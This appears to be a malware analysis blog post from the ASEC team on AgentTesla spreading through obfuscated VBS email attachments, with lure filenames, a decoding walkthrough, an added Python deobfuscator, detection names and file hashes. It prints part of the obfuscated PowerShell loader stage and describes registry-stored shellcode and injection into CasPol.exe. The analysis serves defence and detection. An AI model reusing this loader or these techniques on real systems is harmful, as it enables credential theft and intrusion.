AgentTesla Being Distributed via VBS

The ASEC analysis team has recently identified that AgentTesla is being distributed through malicious VBS. The script file contains code that has been obfuscated in multiple layers. AgentTesla was found being distributed last May through a Windows Help file (*.chm), and its distribution method appears to be continuously changing.

AgentTesla Being Distributed Through Windows Help File (*.chm)

The VBS script is distributed as an attachment to emails. Recently, emails impersonating those from Korean corporations have also been identified.

Distributed email

The compressed attachment contains the VBS file, and the filenames commonly reference invoices and proposals. The confirmed filenames are as follows:

Date   Filename
10/05  doc_10049500220529464169750.pdf.vbs
10/07  doc_5246701207754814333490.vbs
10/12  № 106 – Supply of Flex.vbs
       protected copy of the commercial invoice.vbs
10/12  LJUR900225565_pdf.vbs
10/13  770140578183.CL.NoticeOfArrival.vbs
10/15  Urgent RFQ No.6554342.vbs
10/17  JKTR002014953_5101075053_ppwk.vbs
10/17  Order List(Draft) 9419-PDF.vbs
10/18  BESOLO.vbs
10/21  BEST SOLU.vbs
Confirmed filenames

The confirmed VBS files contain a large number of comments and dummy code.

Confirmed VBS file

Aside from the comments and dummy code, there is code at the bottom of the file that reads the strings in the currently running VBS file, excluding every 2 characters.

Code inside the VBS

When this code is executed, the strings that were in the comments are decoded and a new script is executed. The decoded code includes an obfuscated shellcode and an additional PowerShell command.

Decoded VBS code

When the above script code is executed, the value of ‘Ch8’, an obfuscated shellcode, is saved to HKCU\Software\Basilicae17\Vegetates.

Value saved to the registry

Afterward, the value of the ‘O9’ variable is executed through PowerShell. The ‘O9’ variable contains a PowerShell command, and the executed command is obfuscated as shown below.

powershell.exe  "$Quegh = """DatFMaruBidnMescFultkariStaoPtenKol EftHStaTBesBCel Uer{Taw fem Las Ude UndpLawaDokrSlaaQuamAsi(Uhj[DagSBontUnbrSkaiTilnHalgTis]Fes`$LivHPerSWir)Con;Fat Ret Hjl Amp Aft`$IntBLavySaltfaseBinsEno Che=Sax CenNDvdeDoswCyp-VovOShab <omitted> Ind5Nin3Ree#Apo;""";;
Function Tammy159 { param([String]$HS);  For($i=3; $i -lt $HS.Length-1; $i+=(3+1)){ $Statice = $Statice + $HS.Substring($i, 1);   }    $Statice;}
$Ambulancetjeneste1820 = Tammy159 'UnsIPujEFolXInt ';
$Ambulancetjeneste1821= Tammy159 $Quegh;
& ($Ambulancetjeneste1820) $Ambulancetjeneste1821;;
PowerShell command that is executed

The PowerShell code decodes the obfuscated value stored in the ‘$Quegh’ variable by excluding every 3 characters: the Tammy159 function starts at index 3 and keeps one character out of every four (e.g. UnsIPujEFolXInt -> IEX).
The decoded command is also obfuscated, and the code that is ultimately executed is as follows.

The PowerShell command that is executed ultimately
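
The character-skipping decode described above, as an added example (analyst-side Python, not code from the ASEC post): it mirrors the loop of the Tammy159 function, undoes the backtick escape in the visible part of the $Quegh literal first, and, going beyond the page, tries several junk lengths on the assumption that other stages use the same loop shape. The function names, sample constants and keyword list are assumptions.

```python
import re

# Constructed samples: the two obfuscated literals visible in the command above.
# The second is only the part of $Quegh shown before the page's elision.
SAMPLE_IEX = "UnsIPujEFolXInt "
SAMPLE_QUEGH_PREFIX = (
    "DatFMaruBidnMescFultkariStaoPtenKol EftHStaTBesBCel Uer{Taw fem Las Ude "
    "UndpLawaDokrSlaaQuamAsi(Uhj[DagSBontUnbrSkaiTilnHalgTis]Fes`$LivHPerSWir)Con;Fat "
)

# Assumed keyword list for scoring candidate decodings (not from the page).
KEYWORDS = ("iex", "function", "param(", "new-object")


def ps_unescape(literal: str) -> str:
    """Drop PowerShell backtick escapes (`$ -> $) the way a double-quoted
    string is parsed, so the 4-character groups line up again.
    Simplification: `n, `t and similar are not expanded."""
    return re.sub(r"`(.)", r"\1", literal, flags=re.DOTALL)


def strip_junk(text: str, junk: int = 3) -> str:
    """Same loop as the script's Tammy159: start at index `junk`, stop before
    the last character, step junk + 1, keep one character each time."""
    return "".join(text[i] for i in range(junk, len(text) - 1, junk + 1))


def guess_junk(text: str, max_junk: int = 6) -> dict:
    """Try several junk lengths and keep decodings that contain a keyword."""
    hits = {}
    for junk in range(1, max_junk + 1):
        decoded = strip_junk(text, junk)
        if any(k in decoded.lower() for k in KEYWORDS):
            hits[junk] = decoded
    return hits


if __name__ == "__main__":
    print(strip_junk(SAMPLE_IEX))
    print(strip_junk(ps_unescape(SAMPLE_QUEGH_PREFIX)))
    print(guess_junk(SAMPLE_IEX))
```

Decoding the raw literal without ps_unescape shifts every group after the first backtick by one character, which is why the unescape step comes first.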

The obfuscated shellcode that was previously saved in HKCU\Software\Basilicae17\Vegetates is Base64-decoded and executed. The executed shellcode injects the AgentTesla malware into CasPol.exe, a legitimate process. AgentTesla is an info-stealer that collects user PC information, compresses it into CO_[username]/[PC name].zip and leaks it via email.

The email information used is as follows.

Leaked information

AgentTesla is malware that also ranks prominently in the weekly statistics, and its distribution method is continuously changing. Caution is also advised because, depending on the shellcode, a variety of malware other than AgentTesla can be executed.

[File Detection]
Dropper/VBS.Generic
Downloader/VBS.Powershell
Trojan/VBS.Agent
Trojan/VBS.Obfuscated

[IOC]
7fe2ed92d9306c8f0843cbb4a38f88e0
b06081daa9bc002cd750efb65e1e932e
eccef74de61f20a212ecbb4ead636f73
ea202427fbe14d9a6d808b9ee911f68c


The post AgentTesla Being Distributed via VBS appeared first on ASEC BLOG.
